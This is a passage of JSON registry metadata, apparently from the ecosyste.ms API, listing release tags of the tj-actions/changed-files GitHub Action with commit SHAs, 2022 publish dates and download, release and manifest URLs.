z/v20.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v20.1","dependencies_parsed_at":"2023-11-09T04:04:25.065Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v20.1/manifests"},{"name":"v20","sha":"581eef0495dd5b75a3dd93047ff9f0d42dc09370","kind":"commit","published_at":"2022-05-15T01:43:30.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v20","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v20","dependencies_parsed_at":"2023-11-09T04:04:19.327Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v20/manifests"},{"name":"v19.3","sha":"e55f7fb99e90111108bc24d3f14156b06ab6a12c","kind":"commit","published_at":"2022-05-14T22:45:52.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v19.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v19.3","dependencies_parsed_at":"2023-11-09T04:04:47.666Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v19.3/manifests"},{"name":"v19.2","sha":"07b38ce1a17c46f1d0eb1150c8a33f703d473262","kind":"commit","published_at":"2022-05-14T22:19:03.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v19.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v19.2","dependencies_parsed_at":"2023-11-09T04:04:26.072Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v19.2/manifests"},{"name":"v19.1","sha":"d26252004aa87df12f72411feec056907ecdbadc","kind":"commit","published_at":"2022-05-14T06:25:05.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v19.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v19.1","dependencies_parsed_at":"2023-11-09T04:04:28.123Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v19.1/manifests"},{"name":"v19","sha":"a6d456f542692915c5289ea834fb89bc07c11208","kind":"commit","published_at":"2022-04-28T06:08:15.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v19","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v19","dependencies_parsed_at":"2023-11-09T04:04:48.437Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v19/manifests"},{"name":"v18.7","sha":"a59f800cbb60ed483623848e31be67659a2940f8","kind":"commit","published_at":"2022-04-08T09:43:01.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v18.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v18.7","dependencies_parsed_at":"2023-11-09T04:04:47.902Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v18.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.7/manifests"},{"name":"v18.6","sha":"a2f1692a6f703b7a14e155ae404e6bb15538b763","kind":"commit","published_at":"2022-03-30T12:17:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v18.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v18.6","dependencies_parsed_at":"2023-11-09T04:04:22.491Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v18.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.6/manifests"},{"name":"v18.5","sha":"72aab29255d4fd553ccf1c0fa3223dcc62a2fd84","kind":"commit","published_at":"2022-03-29T15:00:10.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v18.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v18.5","dependencies_parsed_at":"2023-11-09T04:04:48.384Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v18.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.5/manifests"},{"name":"v18.4","sha":"e35d0afdc1f0b01f84ec0f4cdf1b179325634b36","kind":"commit","published_at":"2022-03-21T01:30:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v18.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v18.4","dependencies_parsed_at":"2023-07-20T14:17:30.456Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v18.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.4/manifests"},{"name":"v18.3","sha":"081ee9cc54a7ded6c421c632f23a31dbbe34a5f3","kind":"commit","published_at":"2022-03-16T14:58:25.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v18.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v18.3","dependencies_parsed_at":"2023-07-20T14:17:32.501Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v18.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.3/manifests"},{"name":"v18.2","sha":"1f30bd2085b83668fb636f1a1f90744d8adbacca","kind":"commit","published_at":"2022-03-16T05:32:30.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v18.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v18.2","dependencies_parsed_at":"2023-07-20T14:17:21.549Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.2/manifests"},{"name":"v18.1","sha":"227e314ad84036340cab47e649d91b012275a53c","kind":"commit","published_at":"2022-03-14T18:43:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v18.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v18.1","dependencies_parsed_at":"2023-07-20T14:17:30.781Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18.1/manifests"},{"name":"v18","sha":"ffd30e8dd820b89653c2298acf0447d29dbd0f16","kind":"commit","published_at":"2022-03-14T05:03:59.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v18","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v18","dependencies_parsed_at":"2023-07-20T14:17:35.036Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v18/manifests"},{"name":"v17.3","sha":"f5a8de7d36c5909d300d7fcc8d6340d2a56ab9d9","kind":"commit","published_at":"2022-03-08T11:59:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v17.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v17.3","dependencies_parsed_at":"2023-07-20T14:17:34.246Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v17.3/manifests"},{"name":"v17.2","sha":"0bc7d4006fb085334217ec5d6e6c288daade2f59","kind":"commit","published_at":"2022-02-27T17:47:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v17.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v17.2","dependencies_parsed_at":"2023-07-20T14:17:33.590Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v17.2/manifests"},{"name":"v17.1","sha":"a53d74f700f2982646d538e66ce35cbfc8d4e826","kind":"commit","published_at":"2022-02-26T10:09:14.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v17.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v17.1","dependencies_parsed_at":"2023-07-20T14:17:33.399Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v17.1/manifests"},{"name":"v17","sha":"933541631c41bad3fe20bdbd440ec68afa9a9518","kind":"commit","published_at":"2022-02-23T08:39:41.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v17","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v17","dependencies_parsed_at":"2023-07-20T14:17:30.410Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v17/manifests"},{"name":"v16","sha":"4daffbaee17b34b8ae544990906277485819cc16","kind":"commit","published_at":"2022-02-18T04:23:53.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v16","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v16","dependencies_parsed_at":"2023-07-20T14:17:21.416Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v16/manifests"},{"name":"v15","sha":"09441d38eaf8b76cbe2c42e256f46dfb432f63a4","kind":"commit","published_at":"2022-02-17T08:04:39.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v15","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v15","dependencies_parsed_at":"2023-07-20T14:17:33.953Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v15/manifests"},{"name":"v15.1","sha":"4b1f26aed507a21569666773e1c753dfe409d806","kind":"commit","published_at":"2022-02-17T08:03:01.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v15.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v15.1","dependencies_parsed_at":"2023-07-20T14:17:20.971Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v15.1/manifests"},{"name":"v1.0.1","sha":"b915d091052b9d35e7c200d1da10cc6e2ec266e2","kind":"commit","published_at":"2022-02-17T05:15:17.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.0.1","dependencies_parsed_at":"2023-07-20T14:17:34.999Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"f0751de6af436d4e79016e2041cf6400e0833653","kind":"commit","published_at":"2022-02-17T05:12:45.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.0.0","dependencies_parsed_at":"2023-07-20T14:17:21.589Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.0.0/manifests"},{"name":"v5.0.0","sha":"450eadf5a0462f8d0b5e99d07d4b6d8f7358420c","kind":"commit","published_at":"2022-02-17T04:04:56.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v5.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v5.0.0","dependencies_parsed_at":"2023-07-20T14:17:30.395Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5.0.0/manifests"},{"name":"v14.7","sha":"e44053b6a0e8e7df1aa50a171c46601c605f61bb","kind":"commit","published_at":"2022-02-17T03:59:22.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v14.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v14.7","dependencies_parsed_at":"2023-07-20T14:17:31.497Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.7/manifests"},{"name":"v14.6","sha":"c0dba8199070f01fcea9cd3a4dc42b365f06bf8d","kind":"commit","published_at":"2022-02-17T03:59:20.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v14.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v14.6","dependencies_parsed_at":"2023-07-20T14:17:31.914Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.6/manifests"},{"name":"v14.5","sha":"fd2e9917c337ba7e2222d5aa9e32b27a57a71d14","kind":"commit","published_at":"2022-02-17T03:59:19.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v14.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v14.5","dependencies_parsed_at":"2023-07-20T14:17:32.148Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.5/manifests"},{"name":"v14.4","sha":"2a8a501ad614cd775a2c07537b555783496dc085","kind":"commit","published_at":"2022-02-17T03:59:18.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v14.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v14.4","dependencies_parsed_at":"2023-07-20T14:17:20.521Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.4/manifests"},{"name":"v14.3","sha":"a8ea7202c1c248d93235e87cc59e5b3a9881f558","kind":"commit","published_at":"2022-02-17T03:59:17.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v14.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v14.3","dependencies_parsed_at":"2023-07-20T14:17:20.780Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.3/manifests"},{"name":"v14.2","sha":"88edda5361ed308226d6cb938eaa8b18182750f5","kind":"commit","published_at":"2022-02-17T03:59:16.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v14.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v14.2","dependencies_parsed_at":"2023-07-20T14:17:20.296Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.2/manifests"},{"name":"v14.1","sha":"be68c10267c4979ed30c9397041b052b2980f91f","kind":"commit","published_at":"2022-02-17T03:59:15.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v14.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v14.1","dependencies_parsed_at":"2023-07-20T14:17:21.457Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14.1/manifests"},{"name":"v14","sha":"b59431bc7d44f9e8951a290fc7d48879f2ca1939","kind":"commit","published_at":"2022-02-17T03:59:14.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v14","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v14","dependencies_parsed_at":"2023-07-20T14:17:31.225Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v14/manifests"},{"name":"v4.0.7","sha":"473984bd85c24f1fe61c0494d317cc7d490e1235","kind":"commit","published_at":"2022-02-17T03:54:33.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.0.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.0.7","dependencies_parsed_at":"2023-07-20T14:17:32.907Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.7/manifests"},{"name":"v4.0.6","sha":"032f37fd241eeaf66ead8120552a3c6a157d1f22","kind":"commit","published_at":"2022-02-17T03:54:32.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.0.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.0.6","dependencies_parsed_at":"2023-07-20T14:17:33.068Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"3a35bdf667b36191faf1eea2b8c2cfbb8890bd25","kind":"commit","published_at":"2022-02-17T03:54:31.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.0.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.0.5","dependencies_parsed_at":"2023-07-20T14:17:21.027Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"c2216f65fdd828a28c41d6c97d242ec39ed694f3","kind":"commit","published_at":"2022-02-17T03:54:29.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.0.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.0.4","dependencies_parsed_at":"2023-07-20T14:17:33.952Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"0f16c26f3d5699a26be12446509c537ee964c1a8","kind":"commit","published_at":"2022-02-17T03:54:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.0.3","dependencies_parsed_at":"2023-07-20T14:17:35.083Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"271468ecafc0c12c5f0ce364317a640a5668eba7","kind":"commit","published_at":"2022-02-17T03:54:27.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.0.2","dependencies_parsed_at":"2023-07-20T14:17:33.681Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"fb063fc7d459d8ee25f9b3ed48ec83bc5c51df72","kind":"commit","published_at":"2022-02-17T03:54:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.0.1","dependencies_parsed_at":"2023-07-20T14:17:30.403Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"a05436ffa9505d25707f781260a99d01cebd0d13","kind":"commit","published_at":"2022-02-17T03:43:42.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.0.0","dependencies_parsed_at":"2023-07-20T14:17:32.799Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.0.0/manifests"},{"name":"v3.0.2","sha":"1980f551b48196e1d8aa48fbfd924cedde0d3e13","kind":"commit","published_at":"2022-02-17T03:40:37.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v3.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v3.0.2","dependencies_parsed_at":"2023-07-20T14:17:30.401Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"a86b5608ded2e43fee87cbbde6394e0be7f46a41","kind":"commit","published_at":"2022-02-17T03:40:05.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v3.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v3.0.1","dependencies_parsed_at":"2023-07-20T14:17:31.894Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"f917cc3459f79321da6af2a153cb91ce82a34aaf","kind":"commit","published_at":"2022-02-17T03:39:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v3.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v3.0.0","dependencies_parsed_at":"2023-07-20T14:17:21.392Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.0.0/manifests"},{"name":"v13.2","sha":"68bd279d40fb5bfc976429283b060c6ee426f63c","kind":"commit","published_at":"2022-02-17T03:22:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v13.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v13.2","dependencies_parsed_at":"2023-07-20T14:17:30.616Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v13.2/manifests"},{"name":"v13.1","sha":"2c85495a7bb72f2734cb5181e29b2ee5e08e61f7","kind":"commit","published_at":"2022-02-17T03:20:21.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v13.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v13.1","dependencies_parsed_at":"2023-07-20T14:17:34.034Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2F